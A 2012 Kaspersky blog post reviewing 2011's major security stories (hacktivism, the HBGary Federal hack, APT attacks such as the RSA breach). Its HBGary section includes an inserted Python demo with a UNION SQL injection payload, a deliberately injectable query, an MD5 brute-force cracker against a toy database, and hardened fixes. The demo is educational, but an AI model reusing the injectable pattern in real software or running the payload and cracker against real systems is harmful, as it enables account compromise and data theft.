2011: An explosive year in security

By Costin Raiu, Director of Kaspersky Lab's Global Research & Analysis Team | Jan 10, 2012

If we had to summarize the year in security in a single word, I think it would have to be “explosive.” The multitude of incidents, stories, facts, new trends and intriguing actors is so big that it makes it very hard to come up with a top 10 of security stories of 2011.

What I was aiming for with this list was to remember the stories that also indicated major trends or the emergence of new major actors on the security scene. By looking at these stories, we can get an idea of what will happen in 2012.

1. The rise of “hacktivism”

It’s difficult to imagine someone reading this list who has not yet heard of Anonymous, LulzSec, and maybe TeaMp0isoN. Throughout 2011 these groups, together with others, were actively involved in various operations against law enforcement agencies, banks, governments, security companies and major software vendors.

Sometimes working together, in other cases working against each other, these groups emerged as one of the main sets of actors of 2011, through incidents such as security breaches of networks belonging to the United Nations, security intelligence firm Stratfor, FBI contractor IRC Federal, US Defense contractor ManTech, and the CIA. Interestingly, some of these incidents, such as the Stratfor hack, revealed major security problems such as the storing of customers’ CVV numbers in unencrypted form (PCI DSS prohibits storing them at all after authorization, encrypted or not), or extremely weak passwords used by administrators.

Overall, the rise of hacktivism was one of the major trends of 2011, and no doubt it will continue in 2012 with similar incidents.

2. The HBGary Federal Hack

Although related to the first item on this list, I’d like to point this one out as a separate story. In February 2011, hackers from the Anonymous collective broke into HBGary Federal’s webserver – hbgaryfederal.com – through an SQL injection attack against its content management system. They were able to extract several unsalted MD5 password hashes, including those belonging to the company CEO, Aaron Barr, and COO, Ted Vera.

Unfortunately, both used passwords that were very simple: six lowercase letters and two digits. Once cracked, and because the same passwords were reused on other systems, they allowed the attackers to get access to the company’s research documents and tens of thousands of e-mails stored on Google Apps.

I believe this story is relevant because it demonstrates an interesting situation: weak passwords reused across systems, combined with old, unpatched software and a cloud-hosted mail service, can turn into a security nightmare. If the CEO and COO had used strong, unique passwords, none of this would likely have happened.

Or, if they’d had multi-factor authentication enabled on Google Apps, the attackers wouldn’t have been able to access the administrator account and copy all the company e-mails. It’s important to point out that even if better security measures had been in place, we can’t rule out the possibility that the ever-persistent hackers would have found another way in. Persistence and determination, combined with plenty of time, give the attackers the upper hand.
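The chain described above, an SQL injection that leaks unsalted MD5 hashes followed by a brute force over the “lowercase letters plus two digits” password shape, reproduced as an added example; it is not code from the original article and has nothing to do with HBGary’s actual CMS. Everything in it is constructed: the in-memory SQLite “CMS”, the hypothetical users and their deliberately shortened passwords, and the injection string. The last two functions show the storage scheme that would have blunted the cracking step, a per-user random salt with a slow key-derivation function.

```python
import hashlib
import hmac
import itertools
import os
import sqlite3
import string

# Constructed sample data, not real HBGary records. Usernames are hypothetical.
# The real passwords were six lowercase letters plus two digits; these are three
# letters plus two digits so the pure-Python brute force below finishes in seconds.
SAMPLE_USERS = {"ceo": "abc12", "coo": "xyz99"}
# Classic UNION-based payload: closes the string literal, appends our own
# SELECT, and comments out the remainder of the original statement.
INJECTION = "' UNION SELECT username || ':' || pwhash FROM users --"
PBKDF2_ITERATIONS = 600_000


def make_db():
    """Toy CMS: a pages table the public site queries and a users table that
    stores unsalted MD5 hashes, the scheme the article describes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id TEXT, title TEXT)")
    conn.execute("INSERT INTO pages VALUES ('1', 'Home')")
    conn.execute("CREATE TABLE users (username TEXT, pwhash TEXT)")
    for user, pw in SAMPLE_USERS.items():
        conn.execute("INSERT INTO users VALUES (?, ?)",
                     (user, hashlib.md5(pw.encode()).hexdigest()))
    return conn


def page_title_vulnerable(conn, page_id):
    """Untrusted input pasted into the SQL text: the injectable pattern."""
    sql = f"SELECT title FROM pages WHERE id = '{page_id}'"
    return [row[0] for row in conn.execute(sql)]


def page_title_safe(conn, page_id):
    """Parameterised query: the payload is just a page id that matches nothing."""
    rows = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,))
    return [row[0] for row in rows]


def extract_hashes(conn):
    """Step 1 of the chain: pull username:hash pairs out through the page lookup."""
    rows = page_title_vulnerable(conn, INJECTION)
    return dict(row.split(":", 1) for row in rows if ":" in row)


def keyspace(letters, digits):
    """Number of passwords of the form <letters> lowercase then <digits> digits."""
    return 26 ** letters * 10 ** digits


def crack_md5(target_hex, letters, digits):
    """Step 2: mask brute force over the password shape. With unsalted MD5 each
    candidate costs one hash, and precomputed (rainbow) tables work as well."""
    target = bytes.fromhex(target_hex)
    for head in itertools.product(string.ascii_lowercase, repeat=letters):
        prefix = "".join(head).encode()
        for tail in itertools.product(string.digits, repeat=digits):
            candidate = prefix + "".join(tail).encode()
            if hashlib.md5(candidate).digest() == target:
                return candidate.decode()
    return None


def store_hardened(password):
    """What would have blunted step 2: a random per-user salt and a slow KDF, so
    every guess costs PBKDF2_ITERATIONS rounds and precomputed tables are useless."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + "$" + dk.hex()


def verify_hardened(record, password):
    """Constant-time comparison against the stored salt$hash record."""
    salt_hex, dk_hex = record.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), PBKDF2_ITERATIONS)
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


if __name__ == "__main__":
    conn = make_db()
    leaked = extract_hashes(conn)
    print("leaked via injection:", leaked)
    print("same payload against the safe lookup:", page_title_safe(conn, INJECTION))
    for user, digest in leaked.items():
        print(f"{user}: {crack_md5(digest, 3, 2)}")
    print("keyspace of the real 6+2 shape:", keyspace(6, 2))
    record = store_hardened("xyz99")
    print("hardened verify:", verify_hardened(record, "xyz99"),
          verify_hardened(record, "xyz98"))
```

Run stand-alone, it prints the two leaked hashes, the empty result the parameterised lookup returns for the same payload, the two recovered passwords, and the size of the real six-plus-two space, 30,891,577,600 candidates. At a few billion MD5 computations per second, roughly what a single GPU already managed in 2011 (an approximate figure, not from the article), that space is exhausted in seconds; the PBKDF2 scheme multiplies the per-guess cost by 600,000 and, because of the salt, forces a separate run for every user.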

3. The advanced persistent threat

Although many security experts despise this term, it has made its way into the media and rocketed to super-popularity with incidents such as the RSA security breach and the imposingly titled operations Night Dragon, Lurid and Shady RAT.

Interestingly, many of these operations were not particularly advanced at all. On the other hand, there were many cases in which zero-day exploits were used, such as in the RSA breach. In this case, the attackers took advantage of CVE-2011-0609 – a vulnerability in Adobe Flash Player, delivered as a Flash object embedded in an Excel spreadsheet attached to a spear-phishing e-mail – to run malicious code on the target machine. Another interesting zero-day was CVE-2011-2462, a vulnerability in Adobe Reader’s handling of U3D content, which was used in targeted attacks against U.S. Defense contractor ManTech.

Several things stand out in these attacks: many cases involved zero-day vulnerabilities in Adobe software; many of the attacks were directed at U.S. targets, notably companies working with the U.S. military or government; and the Lurid attack was interesting because it mainly targeted Russia and other CIS countries in Eastern Europe and Central Asia. These attacks confirm the emergence of powerful nation-state actors and the establishment of cyber-espionage as common practice.

Additionally, many of these attacks seemed to be interconnected and have major global ramifications. For instance, the RSA breach was notable because the attackers stole data related to SecurID tokens (the seed material behind the one-time codes), which was later used in another high-profile attack, the intrusion attempt at defense contractor Lockheed Martin.
